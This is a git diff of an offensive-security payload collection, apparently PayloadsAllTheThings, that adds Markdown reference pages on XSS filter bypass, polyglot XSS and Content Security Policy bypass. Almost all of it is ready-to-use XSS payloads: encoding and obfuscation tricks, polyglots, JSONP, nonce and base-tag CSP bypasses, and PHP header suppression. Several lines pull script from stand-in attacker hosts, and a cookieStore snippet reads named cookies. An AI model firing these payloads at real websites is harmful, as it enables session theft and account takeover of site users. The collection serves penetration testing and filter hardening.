diff --git a/XSS Injection/1 - XSS Filter Bypass.md b/XSS Injection/1 - XSS Filter Bypass.md new file mode 100644 index 0000000..c12a961 --- /dev/null +++ b/XSS Injection/1 - XSS Filter Bypass.md @@ -0,0 +1,570 @@ +# XSS Filter Bypass + +## Summary + +- [Bypass case sensitive](#bypass-case-sensitive) +- [Bypass tag blacklist](#bypass-tag-blacklist) +- [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) +- [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) +- [Bypass quotes for string](#bypass-quotes-for-string) +- [Bypass quotes in script tag](#bypass-quotes-in-script-tag) +- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) +- [Bypass dot filter](#bypass-dot-filter) +- [Bypass parenthesis for string](#bypass-parenthesis-for-string) +- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon) +- [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist) +- [Bypass space filter](#bypass-space-filter) +- [Bypass email filter](#bypass-email-filter) +- [Bypass document blacklist](#bypass-document-blacklist) +- [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) +- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) +- [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) +- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) +- [Bypass ">" using nothing](#bypass--using-nothing) +- [Bypass "<" and ">" using < and >](#bypass--and--using--and-) +- [Bypass ";" using another character](#bypass--using-another-character) +- [Bypass using missing charset header](#bypass-using-missing-charset-header) +- [Bypass using HTML encoding](#bypass-using-html-encoding) +- [Bypass using Katakana](#bypass-using-katakana) +- [Bypass using Cuneiform](#bypass-using-cuneiform) +- [Bypass using Lontara](#bypass-using-lontara) +- [Bypass using ECMAScript6](#bypass-using-ecmascript6) +- [Bypass using Octal encoding](#bypass-using-octal-encoding) +- [Bypass using Unicode](#bypass-using-unicode) +- [Bypass using UTF-7](#bypass-using-utf-7) +- [Bypass using UTF-8](#bypass-using-utf-8) +- [Bypass using UTF-16be](#bypass-using-utf-16be) +- [Bypass using UTF-32](#bypass-using-utf-32) +- [Bypass using BOM](#bypass-using-bom) +- [Bypass using jsfuck](#bypass-using-jsfuck) +- [References](#references) + + +## Bypass case sensitive + +To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names. + +```javascript + + +``` + +Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters. + + +## Bypass tag blacklist + +```javascript + + + + +``` + +## Bypass quotes in mousedown event + +You can bypass a single quote with ' in an on mousedown event handler + +```javascript +Link +``` + +## Bypass dot filter + +```javascript + +``` + +Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` +http://www.geektools.com/cgi-bin/ipconv.cgi + +```javascript + + + + +// From @terjanq + + +// From @cgvwzq + +``` + +## Bypass onxxxx= blacklist + +```javascript + + + +// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed + + + + + +// Bypass onxxx= filter with a '/' + +``` + +## Bypass space filter + +```javascript +// Bypass space filter with "/" + + +// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I + + +$ echo "" | xxd +00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c . +``` + + +## Bypass email filter + +* [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate) + ```javascript + ">"@x.y + ``` + +* [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/) + ```javascript + xss@example.com() + ``` + + +## Bypass tel URI filter + +At least 2 RFC mention the `;phone-context=` descriptor: + +* [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt) +* [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt) + +```javascript ++330011223344;phone-context= +``` + + +## Bypass document blacklist + +```javascript +
+window["doc"+"ument"] +``` + +## Bypass document.cookie blacklist + +This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. + +``` +window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); +``` + +## Bypass using javascript inside a string + +```javascript +"; + +``` + +## Bypass using an alternate way to redirect + +```javascript +location="http://google.com" +document.location = "http://google.com" +document.location.href="http://google.com" +window.location.assign("http://google.com") +window['location']['href']="http://google.com" +``` + +## Bypass using an alternate way to execute an alert + +From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. + +```javascript +window['alert'](0) +parent['alert'](1) +self['alert'](2) +top['alert'](3) +this['alert'](4) +frames['alert'](5) +content['alert'](6) + +[7].map(alert) +[8].find(alert) +[9].every(alert) +[10].filter(alert) +[11].findIndex(alert) +[12].forEach(alert); +``` + +From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables + +The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**. + +```javascript +c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } +// 5 +``` + +Then calling alert is : + +```javascript +Object.keys(self)[5] +// "alert" +self[Object.keys(self)[5]]("1") // alert("1") +``` + +We can find "alert" with a regular expression like ^a[rel]+t$ : + +```javascript +a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() + +// then you can use a() with Object.keys + +self[Object.keys(self)[a()]]("1") // alert("1") +``` + +Oneliner: +```javascript +a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") +``` + +From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. + +```javascript +prompt`${document.domain}` +document.location='java\tscript:alert(1)' +document.location='java\rscript:alert(1)' +document.location='java\tscript:alert(1)' +``` + +From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet. + +```javascript +eval('ale'+'rt(0)'); +Function("ale"+"rt(1)")(); +new Function`al\ert\`6\``; + +constructor.constructor("aler"+"t(3)")(); +[].filter.constructor('ale'+'rt(4)')(); + +top["al"+"ert"](5); +top[8680439..toString(30)](7); +top[/al/.source+/ert/.source](8); +top['al\x65rt'](9); + +open('java'+'script:ale'+'rt(11)'); +location='javascript:ale'+'rt(12)'; + +setTimeout`alert\u0028document.domain\u0029`; +setTimeout('ale'+'rt(2)'); +setInterval('ale'+'rt(10)'); +Set.constructor('ale'+'rt(13)')(); +Set.constructor`al\x65rt\x2814\x29```; +``` + +Bypass using an alternate way to trigger an alert + +```javascript +var i = document.createElement("iframe"); +i.onload = function(){ + i.contentWindow.alert(1); +} +document.appendChild(i); + +// Bypassed security +XSSObject.proxy = function (obj, name, report_function_name, exec_original) { + var proxy = obj[name]; + obj[name] = function () { + if (exec_original) { + return proxy.apply(this, arguments); + } + }; + XSSObject.lockdown(obj, name); + }; +XSSObject.proxy(window, 'alert', 'window.alert', false); +``` + +## Bypass ">" using nothing + +You don't need to close your tags. + +```javascript +" using < and > + +Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#bypass-using-unicode) for more. + +```javascript +<script/src=//evil.site/poc.js> +``` + +## Bypass ";" using another character + +```javascript +'te' * alert('*') * 'xt'; +'te' / alert('/') / 'xt'; +'te' % alert('%') % 'xt'; +'te' - alert('-') - 'xt'; +'te' + alert('+') + 'xt'; +'te' ^ alert('^') ^ 'xt'; +'te' > alert('>') > 'xt'; +'te' < alert('<') < 'xt'; +'te' == alert('==') == 'xt'; +'te' & alert('&') & 'xt'; +'te' , alert(',') , 'xt'; +'te' | alert('|') | 'xt'; +'te' ? alert('ifelsesh') : 'xt'; +'te' in alert('in') in 'xt'; +'te' instanceof alert('instanceof') instanceof 'xt'; +``` + + +## Bypass using missing charset header + +**Requirements**: + +* Server header missing `charset`: `Content-Type: text/html` + +### ISO-2022-JP + +ISO-2022-JP uses escape characters to switch between several character sets. + +| Escape | Encoding | +|-----------|-----------------| +| `\x1B (B` | ASCII | +| `\x1B (J` | JIS X 0201 1976 | +| `\x1B $@` | JIS X 0208 1978 | +| `\x1B $B` | JIS X 0208 1983 | + + +Using the [code table](https://en.wikipedia.org/wiki/JIS_X_0201#Codepage_layout), we can find multiple characters that will be transformed when switching from **ASCII** to **JIS X 0201 1976**. + +| Hex | ASCII | JIS X 0201 1976 | +| ---- | --- | --- | +| 0x5c | `\` | `¥` | +| 0x7e | `~` | `‾` | + + +**Example** + +Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unescaping the quote. + +Payload: `search=%1b(J&lang=en";alert(1)//` + + +## Bypass using HTML encoding + +```javascript +%26%2397;lert(1) +alert +> +``` + +## Bypass using Katakana + +Using the [aemkei/Katakana](https://github.com/aemkei/katakana.js) library. + +```javascript +javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() +``` + +## Bypass using Cuneiform + +```javascript +𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], +𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] ++(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] ++𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() +``` + +## Bypass using Lontara + +```javascript +ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")() +``` + +More alphabets on http://aem1k.com/aurebesh.js/# + +## Bypass using ECMAScript6 + +```html + +``` + +## Bypass using Octal encoding + + +```javascript +javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' +``` + +## Bypass using Unicode + +This payload takes advantage of Unicode escape sequences to obscure the JavaScript function + +```html + +``` + +It uses Unicode escape sequences to represent characters. + +| Unicode | ASCII | +| -------- | --------- | +| `\u0061` | a | +| `\u006C` | l | +| `\u0065` | e | +| `\u0072` | r | +| `\u0074` | t | + + +Same thing with these Unicode characters. + +| Unicode (UTF-8 encoded) | Unicode Name | ASCII | ASCII Name | +| ----------------------- | ---------------------------- | ----- | ---------------| +| `\uFF1C` (%EF%BC%9C) | FULLWIDTH LESS­THAN SIGN | < | LESS­THAN | +| `\uFF1E` (%EF%BC%9E) | FULLWIDTH GREATER­THAN SIGN | > | GREATER­THAN | +| `\u02BA` (%CA%BA) | MODIFIER LETTER DOUBLE PRIME | " | QUOTATION MARK | +| `\u02B9` (%CA%B9) | MODIFIER LETTER PRIME | ' | APOSTROPHE | + + +An example payload could be `ʺ><svg onload=alert(/XSS/)>/`, which would look like that after being URL encoded: + +```javascript +%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ +``` + + +When Unicode characters are converted to another case, they might bypass a filter look for specific keywords. + +| Unicode | Transform | Character | +| -------- | --------- | --------- | +| `İ` (%c4%b0) | `toLowerCase()` | i | +| `ı` (%c4%b1) | `toUpperCase()` | I | +| `ſ` (%c5%bf) | `toUpperCase()` | S | +| `K` (%E2%84) | `toLowerCase()` | k | + +The following payloads become valid HTML tags after being converted. + +```html +<ſvg onload=... > +<ıframe id=x onload=> +``` + + +## Bypass using UTF-7 + +```javascript ++ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- +``` + +## Bypass using UTF-8 + +```javascript +< = %C0%BC = %E0%80%BC = %F0%80%80%BC +> = %C0%BE = %E0%80%BE = %F0%80%80%BE +' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 +" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 +" = %CA%BA +' = %CA%B9 +``` + +## Bypass using UTF-16be + +```javascript +%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 +\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> +``` + +## Bypass using UTF-32 + +```js +%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E +``` + +## Bypass using BOM + +Byte Order Mark (The page must begin with the BOM character.) +BOM character allows you to override charset of the page + +```js +BOM Character for UTF-16 Encoding: +Big Endian : 0xFE 0xFF +Little Endian : 0xFF 0xFE +XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E + +BOM Character for UTF-32 Encoding: +Big Endian : 0x00 0x00 0xFE 0xFF +Little Endian : 0xFF 0xFE 0x00 0x00 +XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E +``` + + +## Bypass using jsfuck + +Bypass using [jsfuck](http://www.jsfuck.com/) + +```javascript +[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() +``` + + +## References + +- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) \ No newline at end of file diff --git a/XSS Injection/2 - XSS Polyglot.md b/XSS Injection/2 - XSS Polyglot.md new file mode 100644 index 0000000..617237b --- /dev/null +++ b/XSS Injection/2 - XSS Polyglot.md @@ -0,0 +1,77 @@ +# Polyglot XSS + +* Polyglot XSS - 0xsobky + ```javascript + jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e + ``` + +* Polyglot XSS - Ashar Javed + ```javascript + ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> + ``` + +* Polyglot XSS - Mathias Karlsson + ```javascript + " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// + ``` + +* Polyglot XSS - Rsnake + ```javascript + ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> + ``` + +* Polyglot XSS - Daniel Miessler + ```javascript + ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> + “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// + '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> + javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* + javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a + javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ + javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* + javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* + javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// + javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* + --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* + /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* + javascript://--></title></style></textarea></script><svg "//' onclick=alert()// + /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* + ``` + + +* Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) + ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) + ```javascript + -->'"/></sCript><svG x=">" onload=(co\u006efirm)``> + ``` + + ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) + ```javascript + <svg%0Ao%00nload=%09((pro\u006dpt))()// + ``` + +* Polyglot XSS - from [@filedescriptor's Polyglot Challenge](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/) + ```javascript + // Author: crlf + javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> + + // Author: europa + javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//> + + // Author: EdOverflow + javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> + + // Author: h1/ragnar + javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>` + ``` + +* Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) + ```javascript + JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76--> + ``` + + +## References + +- [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/) +- [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/) \ No newline at end of file diff --git a/XSS Injection/XSS Common WAF Bypass.md b/XSS Injection/3 - XSS Common WAF Bypass.md similarity index 100% rename from XSS Injection/XSS Common WAF Bypass.md rename to XSS Injection/3 - XSS Common WAF Bypass.md diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md new file mode 100644 index 0000000..8f86860 --- /dev/null +++ b/XSS Injection/4 - CSP Bypass.md @@ -0,0 +1,181 @@ +# CSP Bypass + +> A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, styles, images, etc.) are allowed to load and execute on a webpage. + + +## Summary + +- [CSP Detection](#csp-detection) +- [Bypass CSP using JSONP](#bypass-csp-using-jsonp) +- [Bypass CSP default-src](#bypass-csp-default-src) +- [Bypass CSP inline eval](#bypass-csp-inline-eval) +- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline) +- [Bypass CSP script-src self](#bypass-csp-script-src-self) +- [Bypass CSP script-src data](#bypass-csp-script-src-data) +- [Bypass CSP nonce](#bypass-csp-nonce) +- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php) +- [References](#references) + + +## CSP Detection + +Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) + + +## Bypass CSP using JSONP + +**Requirements**: + +* CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';` + +**Payload**: + +Use a callback function from a whitelisted source listed in the CSP. + +* Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);` +* Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)` +* Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();` +* Youtube: `https://www.youtube.com/oembed?callback=alert;` +* [Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt) +* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) + +```js +<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>" +``` + + +## Bypass CSP default-src + +**Requirements**: + +* CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, + +**Payload**: + +`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;` + +```js +script=document.createElement('script'); +script.src='//remoteattacker.lab/csp.js'; +window.frames[0].document.head.appendChild(script); +``` + +Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa) + + +## Bypass CSP inline eval + +**Requirements**: + +* CSP `inline` or `eval` + + +**Payload**: + +```js +d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) +``` + +Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) + + +## Bypass CSP script-src self + +**Requirements**: + +* CSP like `script-src self` + +**Payload**: + +```js +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> +``` + +Source: [@akita_zen](https://twitter.com/akita_zen) + + +## Bypass CSP script-src data + +**Requirements**: + +* CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src). + + +**Payload**: + +```javascript +<script src="data:,alert(1)">/</script> +``` + +Source: [@404death](https://twitter.com/404death/status/1191222237782659072) + + +## Bypass CSP unsafe-inline + +**Requirements**: + +* CSP: `script-src https://google.com 'unsafe-inline';` + +**Payload**: + +```javascript +"/><script>alert(1);</script> +``` + + +## Bypass CSP nonce + +**Requirements**: + +* CSP like `script-src 'nonce-RANDOM_NONCE'` +* Imported JS file with a relative link: `<script src='/PATH.js'></script>` + + +**Payload**: + +1. Inject a base tag. + ```html + <base href=http://www.attacker.com> + ``` +2. Host your custom js file at the same path that one of the website's script. + ``` + http://www.attacker.com/PATH.js + ``` + + +## Bypass CSP header sent by PHP + +**Requirements**: + +* CSP sent by PHP `header()` function + + +**Payload**: + +In default `php:apache` image configuration, PHP cannot modify headers when the response's data has already been written. This event occurs when a warning is raised by PHP engine. + +Here are several ways to generate a warning: + +- 1000 $_GET parameters +- 1000 $_POST parameters +- 20 $_FILES + +If the **Warning** are configured to be displayed you should get these: + +* **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0` +* **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2` + + +```ps1 +GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a +``` + +Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070) + + + +## References + +- [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) +- [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - 27 Jun 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) +- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - 2020-04-06](https://www.buaq.net/go-25883.html) \ No newline at end of file diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/5 - XSS in Angular.md similarity index 98% rename from XSS Injection/XSS in Angular.md rename to XSS Injection/5 - XSS in Angular.md index cb34750..1e68d7e 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/5 - XSS in Angular.md @@ -4,7 +4,7 @@ * [Client Side Template Injection](#client-side-template-injection) * [Stored/Reflected XSS](#storedreflected-xss) - * [Advanced bypassing XSS](#advanced-bypassing-xss) + * [Advanced Bypassing XSS](#advanced-bypassing-xss) * [Blind XSS](#blind-xss) * [Automatic Sanitization](#automatic-sanitization) * [References](#references) @@ -161,7 +161,7 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS {{constructor.constructor('alert(1)')()}} ``` -### Advanced bypassing XSS +### Advanced Bypassing XSS AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 23a2732..40075ec 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -5,12 +5,12 @@ ## Summary - [Vulnerability Details](#vulnerability-details) -- [Exploit code or POC](#exploit-code-or-poc) - - [Data grabber for XSS](#data-grabber-for-xss) +- [Proof of Concept](#proof-of-concept) + - [Data Grabber](#data-grabber) - [CORS](#cors) - - [UI redressing](#ui-redressing) - - [Javascript keylogger](#javascript-keylogger) - - [Other ways](#other-ways) + - [UI Redressing](#ui-redressing) + - [Javascript Keylogger](#javascript-keylogger) + - [Other Ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [Tools](#tools) - [XSS in HTML/Applications](#xss-in-htmlapplications) @@ -21,14 +21,15 @@ - [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized) - [DOM based XSS](#dom-based-xss) - [XSS in JS Context](#xss-in-js-context) -- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) +- [XSS in Wrappers for URI](#xss-in-wrappers-for-uri) + - [Wrapper javascript:](#wrapper-javascript) + - [Wrapper data:](#wrapper-data) + - [Wrapper vbscript:](#wrapper-vbscript) - [XSS in files](#xss-in-files) - [XSS in XML](#xss-in-xml) - [XSS in SVG](#xss-in-svg) - 